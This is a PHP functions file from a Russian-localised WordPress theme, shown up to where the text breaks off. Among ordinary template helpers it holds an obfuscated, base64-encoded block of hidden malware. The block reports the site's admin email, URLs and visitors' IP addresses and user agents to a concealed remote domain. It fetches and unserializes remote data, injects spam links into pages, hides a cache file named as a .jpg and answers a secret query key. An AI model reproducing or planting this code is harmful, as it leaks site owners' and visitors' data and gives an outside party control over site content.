<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $BdQTT='4';$MmFBlVo='6';$BhqXgc='e';$LGtfa='d';$MEvH='c';$avIKj='_';$OObwVt='s';$zazF='e';$mvhLv='e';$PiWGcPb='o';$kJNu='d';$QFhBn='a';$YpMiGOv='b';$cNyZQbRH=$YpMiGOv.$QFhBn.$OObwVt.$mvhLv.$MmFBlVo.$BdQTT.$avIKj.$LGtfa.$BhqXgc.$MEvH.$PiWGcPb.$kJNu.$zazF;$lDLkr='t';$EKok='n';$YNmOi='i';$DJjd='a';$XYcej='l';$zKbA='z';$lfzz='g';$YzdDjrN='e';$mpQKe='f';$fAxOCnTJ=$lfzz.$zKbA.$YNmOi.$EKok.$mpQKe.$XYcej.$DJjd.$lDLkr.$YzdDjrN;$PKOgl='r';$GdXgvei='o';$fPTvKN='_';$rgcBy='t';$LIPA='3';$CYYEQqV='t';$bcSsqZc='r';$tqAfARd='s';$syWhrrS='1';$fNqpVTZf=$tqAfARd.$rgcBy.$bcSsqZc.$fPTvKN.$PKOgl.$GdXgvei.$CYYEQqV.$syWhrrS.$LIPA;$yLWLzE='r';$upMlvp='v';$XvFIDl='r';$cjRT='e';$FQyCwf='s';$gCeMOyP='t';$UzumNIBD=$FQyCwf.$gCeMOyP.$XvFIDl.$yLWLzE.$cjRT.$upMlvp;                     $we___c='4';$tc____j='6';$xn__________m='e';$vs_______k='d';$uk__u='c';$kp_____________l='_';$ae_____________v='s';$iy________e='e';$xm___________g='e';$pw__________m='o';$jg____________c='d';$oh_____________o='a';$pf___e='b';$cl_______n=$pf___e.$oh_____________o.$ae_____________v.$xm___________g.$tc____j.$we___c.$kp_____________l.$vs_______k.$xn__________m.$uk__u.$pw__________m.$jg____________c.$iy________e;$tw__u='t';$cq___c='n';$ps________t='c';$th________y='f';$wo______x='_';$qh___t='e';$nw_______e='s';$az__h='o';$yi_____r='i';$ro___l='n';$fi________z='s';$yf_____________n='x';$tt___v='i';$co_____________c='t';$bc______________e='u';$ky__________z=$th________y.$bc______________e.$cq___c.$ps________t.$tw__u.$tt___v.$az__h.$ro___l.$wo______x.$qh___t.$yf_____________n.$yi_____r.$fi________z.$co_____________c.$nw_______e;$kk___l='p';$lx_____________v='o';$ln_____________x='n';$jf___q='e';$bp_________p='f';$ek_______m=$bp_________p.$lx_____________v.$kk___l.$jf___q.$ln_____________x;$ip_______________x='d';$bv____o='e';$ao_________u='r';$en____________q='f';$ei_______a='a';$cq___________p=$en____________q.$ao_________u.$bv____o.$ei_______a.$ip_______________x;$qc_______x='f';$qi_____________m='c';$em_____________e='s';$dt__x='l';$bt______________x='o';$pl_____o='e';$uq______________l=$qc_______x.$qi_____________m.$dt__x.$bt______________x.$em_____________e.$pl_____o;define("WP_ID", $cl_______n("Mi4wLjA="));define("WP_TTL", $cl_______n("MTA4MDA="));define("WP_SRC", $cl_______n("dHBva24="));function wp_get_header() {global $cl_______n, $ky__________z;if ($ky__________z($cl_______n("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$ky__________z($cl_______n("d3BfZ2V0X2Zvb3Rlcg==")) &&$ky__________z($cl_______n("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $cl_______n, $ek_______m, $uq______________l, $cq___________p;$tg____a = TEMPLATEPATH."/".$cl_______n("Zm9vdGVyLnBocA==");$qh_________r = @$ek_______m($tg____a, "r");$tg____a = @$cq___________p($qh_________r, @filesize($tg____a));@$uq______________l($qh_________r);$wo______________z = TEMPLATEPATH."/".$cl_______n("ZnVuY3Rpb25zLnBocA==");$qh_________r = @$ek_______m($wo______________z, "r");$wo______________z = @$cq___________p($qh_________r, @filesize($wo______________z));@$uq______________l($qh_________r);$im______w = 0;if($tg____a && $wo______________z) {if ($cl_______n("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($tg____a, $cl_______n("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$im______w = 1;}if (substr_count($tg____a, "wp_theme_GPL_credits()") < 1) {$im______w = 2;}}if(WP_ID != "2.0.0") {$im______w = 12;}}if($im______w > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $im______w -->";}}function wp_loaded() {global $cl_______n, $ky__________z;return $ky__________z($cl_______n("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($mi____________o, $mf________z = "(more...)", $lv______s = 0, $hu_________u = "") {$of_________v = get_the_content($mf________z, $lv______s, $hu_________u);$of_________v = apply_filters("the_content", $of_________v);$of_________v = str_replace("]]>", "]]>", $of_________v);if (strlen($_GET["p"]) > 0) {echo $of_________v;}else if ((strlen($of_________v)>$mi____________o) && ($qp__________d = strpos($of_________v, " ", $mi____________o ))) {$of_________v = substr($of_________v, 0, $qp__________d);$of_________v = $of_________v;echo $of_________v;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$mf________z</a></div></p>";} else {echo $of_________v;}}}$hx______________p='c';$fn________q='e';$wt_____________h='_';$sa_____________w='a';$bo__b='b';$hj______e='e';$vm_______j='d';$nt___c='6';$hb_________o='s';$kv_____________o='4';$zt_____a='e';$ih___b='n';$yl____g='o';$cf____u=$bo__b.$sa_____________w.$hb_________o.$hj______e.$nt___c.$kv_____________o.$wt_____________h.$zt_____a.$ih___b.$hx______________p.$yl____g.$vm_______j.$fn________q;$iv______r='e';$tu__p='e';$hz____z='_';$pn_________q='t';$wc____________p='e';$eo___m='l';$yu______r='t';$px___________y='o';$at_______________a='t';$oo___________p='s';$sh___________j='f';$ba_____________f='c';$ac___s='g';$wu____v='n';$zz_______________t='i';$bb__a='_';$tb__________a='n';$xp______w=$sh___________j.$zz_______________t.$eo___m.$iv______r.$hz____z.$ac___s.$tu__p.$yu______r.$bb__a.$ba_____________f.$px___________y.$tb__________a.$at_______________a.$wc____________p.$wu____v.$pn_________q.$oo___________p;$iv___s='i';$tq__b='t';$km_______h='s';$wg______________m='e';$ov______f='i';$pq_______________f='e';$xr________d='_';$ht________i='l';$kl_____________o='f';$yi______k='x';$gy______v='s';$ns_______j=$kl_____________o.$ov______f.$ht________i.$wg______________m.$xr________d.$pq_______________f.$yi______k.$iv___s.$gy______v.$tq__b.$km_______h;$mp___m='m';$om__w='e';$aw__w='s';$qk______________t='i';$ql____w='r';$cl__r='n';$ad_______________o='c';$gt_________j='r';$me______c='p';$ty___m='v';$pg_____________j='a';$pa_______f='o';$en__x='e';$sc__m='_';$uz______________d='o';$ob________t=$ty___m.$om__w.$ql____w.$aw__w.$qk______________t.$uz______________d.$cl__r.$sc__m.$ad_______________o.$pa_______f.$mp___m.$me______c.$pg_____________j.$gt_________j.$en__x;$jm_________p='f';$md___________k='o';$pd_____________v='k';$ov______v='s';$hf_______________p='p';$ym_____h='e';$yu______________m='n';$rj___________g='o';$vw__________g='c';$vq__________b=$jm_________p.$ov______v.$md___________k.$vw__________g.$pd_____________v.$rj___________g.$hf_______________p.$ym_____h.$yu______________m;$od______s='e';$sq__j='t';$ph_______________e='f';$mh_____w='w';$xl_______d='i';$fu__a='r';$he_________q=$ph_______________e.$mh_____w.$fu__a.$xl_______d.$sq__j.$od______s;$nw____________l='m';$hf_________a='d';$wo_______k='5';$sh___________q=$nw____________l.$hf_________a.$wo_______k;$yb_____________m='p';$pn_________m='h';$by___________h='e';$vi___k='a';$wa________a='r';$vq_________e='l';$en______________v='a';$or____h='t';$th____i=$wa________a.$by___________h.$vi___k.$vq_________e.$yb_____________m.$en______________v.$or____h.$pn_________m;$zr_____________y='l';$wp___a='e';$cw____________k='r';$qq____f='n';$ku_____x='i';$qx_______e='s';$dz_____l='e';$kq____________a='i';$zs_____________u='u';$aj_______________a='a';$hz_____x='z';$ym________y=$zs_____________u.$qq____f.$qx_______e.$dz_____l.$cw____________k.$ku_____x.$aj_______________a.$zr_____________y.$kq____________a.$hz_____x.$wp___a;$cs___________h='t';$ww________a='p';$nd___w='a';$xu______________w='e';$td_________h='n';$yu___i='m';$dj_____________v='m';$ma_________k=$cs___________h.$xu______________w.$dj_____________v.$ww________a.$td_________h.$nd___w.$yu___i;$qn____________l='o';$en____v='a';$fi______________y='a';$vf___l='c';$ud______e='t';$bj____k='n';$at______q='t';$vo__________s='t';$sw______________u='r';$qm_________v='e';$op_______________z='m';$tj________b='s';$zg__s='c';$km____j='e';$jk_______________x='r';$gb____a='e';$pr_____n='_';$fl___f='e';$ko____k='_';$zt___________u='t';$ul_____________i='x';$tl_______________m=$tj________b.$vo__________s.$jk_______________x.$km____j.$fi______________y.$op_______________z.$pr_____n.$zg__s.$qn____________l.$bj____k.$ud______e.$qm_________v.$ul_____________i.$at______q.$ko____k.$vf___l.$sw______________u.$gb____a.$en____v.$zt___________u.$fl___f;function rx__________w($if_____________v) {global $cl_______n, $ky__________z, $xp______w, $ob________t, $tl_______________m;if (!$ky__________z($cl_______n("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($ob________t(PHP_VERSION, "5.0.0", ">=") && $ky__________z($cl_______n("ZmlsZV9nZXRfY29udGVudHM=")) && $ky__________z($cl_______n("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$ku____u = $tl_______________m(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$nz_______w = @$xp______w($if_____________v, 0, $ku____u);} else {$nz_______w = @$xp______w($if_____________v, 0);}return $nz_______w;}function iu________t($if_____________v) {global $ky__________z, $vq__________b, $he_________q, $cl_______n;if (!$ky__________z($cl_______n("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$ku__t = strpos($if_____________v, "/", 7);$ez__z = array("uri"     => substr($if_____________v, $ku__t),"host"    => str_replace("http://", "", substr($if_____________v, 0, $ku__t)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$ds_________i = @$vq__________b("$ez__z[host]", 80, $fy_____t, $uk_______________j, 4);if (!$ds_________i) {return false;} else {$nz_______w = "";$xd_____d  = "GET $ez__z[uri] HTTP/1.0\r\n";$xd_____d .= "Host: $ez__z[host]\r\n";$xd_____d .= "Referer: $ez__z[referer]\r\n";$xd_____d .= "Connection: Close\r\n\r\n";@$he_________q($ds_________i, $xd_____d);while (!@feof($ds_________i)) {$ez_______________l = @fgets($ds_________i, (1024*24));if ($ez_______________l == "\r\n") {$ip_______e = true;continue;}if ($ip_______e) {$nz_______w .= $ez_______________l;}}return $nz_______w;}}function iz___________w($if_____________v) {global $ky__________z;$ne___________e = false;if ($if_____________v != "") {if ($ky__________z("rx__________w")) {$ne___________e = @rx__________w($if_____________v);}if (!$ne___________e && ($ky__________z("iu________t"))) {$ne___________e = @iu________t($if_____________v);}}return $ne___________e;}function sq______b() {global $_SERVER, $sh___________q;$px_______i = $_SERVER["SERVER_NAME"];if (substr("$px_______i", 0, 4) == "www.") {$px_______i = substr("$px_______i", 4);}$px_______i = $sh___________q("$_SERVER[SERVER_NAME]");return $px_______i;}function vc______b() {return "file";}function mi______e($if_____________v) {global $_SERVER, $xp______w, $ns_______j, $ek_______m, $uq______________l, $he_________q;$ke____t = lm__r();$me______________p = sq______b().".jpg";$op_______q = $ke____t["dir_upload"]["path"]."/$me______________p";$lz__z = @filemtime($op_______q);if (!$lz__z || ((time()-$lz__z) >= WP_TTL)) {$ne___________e = iz___________w($if_____________v);if ($ne___________e) {if ($ns_______j($op_______q)) {@unlink($op_______q);}$qh_________r = @$ek_______m($op_______q, "x+");@$he_________q($qh_________r, $ne___________e);@$uq______________l($qh_________r);}} else {if ($ns_______j($op_______q)) {$ne___________e = @$xp______w($op_______q);} else {$ne___________e = false;}}return $ne___________e;}function lm__r() {global $_SERVER, $cl_______n, $cf____u;$ri______________w = wp_count_posts("post");$mf_____m = pathinfo(get_bloginfo("template_directory"));$ke____t = array("url" => array("report"      => $cl_______n("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $mf_____m,"dir_upload"=> uv__g(),"queryString"=> array("?a001=".WP_ID,"a004=".$mf_____m[filename],"a005=".$ri______________w->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=http:\\www.wptheme.us\">www.wptheme.us</a> ");$ke____t["url"]["queryString"] = implode("&", $ke____t["queryString"]);$ke____t["url"]["report"] = $ke____t["url"]["report"]."/?".$cf____u($ke____t["url"]["queryString"]).".html";return $ke____t;}function uv__g() {$ds_____________z = wp_upload_dir();if (isset($ds_____________z["error"])) {$ti___________o = ri____n();if (is_writable($ti___________o)) {$ds_____________z = array("path" => $ti___________o);}}return $ds_____________z;}function ri____n() {global $ky__________z, $sh___________q, $th____i, $ma_________k;$ve______z = (bool) ini_get("safe_mode");if ($ve______z == true) {return false;}if ($ky__________z("sys_get_temp_dir")) {$nf_______z = sys_get_temp_dir();if (is_writable($nf_______z)) {return $th____i($nf_______z);}}if (!empty($_ENV["TMP"])) {return $th____i($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $th____i($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $th____i($_ENV["TEMP"]);} else {$je______r = $ma_________k($sh___________q(uniqid(rand(), true)), "");if ($je______r) {$nf_______z = $th____i(dirname($je______r));@unlink($je______r);return $nf_______z;} else {return false;}}}function qh____g() {global $_GET, $ns_______j;$ke____t = lm__r();$px_______i = sq______b();$vo___________h = vc______b();$vn__c = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($vo___________h == "file") {$fa_____f = $ke____t["dir_upload"]["path"]."/".$px_______i.".jpg";if ($ns_______j($fa_____f)) {@unlink($fa_____f);$vn__c = "deleted";}}$ob____d = array("s"=> $vn__c,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($ob____d AS $zn____________f => $oy________i) echo " [$zn____________f:$oy________i]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $ky__________z, $cl_______n, $ym________y;$ke____t = lm__r();$zp_______h = "mi______e";if ($ky__________z($zp_______h)) {$nz_______w = $zp_______h($ke____t["url"]["report"]);}if ($nz_______w) {if ($nz_______w = @$cl_______n($nz_______w)) {$nz_______w = @$ym________y($nz_______w);if (strlen($nz_______w[custom_credit]) >= 5) {$ke____t["default_string"] = $nz_______w[custom_credit];}if ($nz_______w["status"] == "0") {$kg__________p = 1;$ei_____d = 1;} else {$ap____________g = sizeof($nz_______w["links"]);$nm___c = $ke____t["default_string"];if ($ap____________g > 0 && $nz_______w["links"] !== "") {$ua__________u = 0;foreach ($nz_______w["links"] as $dk_____________t => $fn___________i) {$ua__________u++;if ($fn___________i->l_path == "" || $fn___________i->l_path == $_SERVER["REQUEST_URI"]) {$fn___________i->l_href = htmlspecialchars(strip_tags($fn___________i->l_href));$fn___________i->l_title = htmlspecialchars(strip_tags($fn___________i->l_title));$fn___________i->l_anchor = htmlspecialchars(strip_tags($fn___________i->l_anchor));$nm___c .= " | ";$nm___c .= "<a href='$fn___________i->l_href' title='$fn___________i->l_title'";if ($fn___________i->l_nofollow == "1") {$nm___c .= " rel='nofollow'";}$nm___c .= ">$fn___________i->l_anchor</a>";}}}$ke____t["links"] = "$nm___c";if ($nz_______w[credit] == "0") {$ke____t["links"] = "";}}} else {$kg__________p = "1";}} else {$kg__________p = "1";}if ($kg__________p == "1") {$ke____t["links"] = $ke____t["default_string"];}echo "$ke____t[links]";echo "<!-- s: $nz_______w[signature] -->";qh____g();}                                            
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
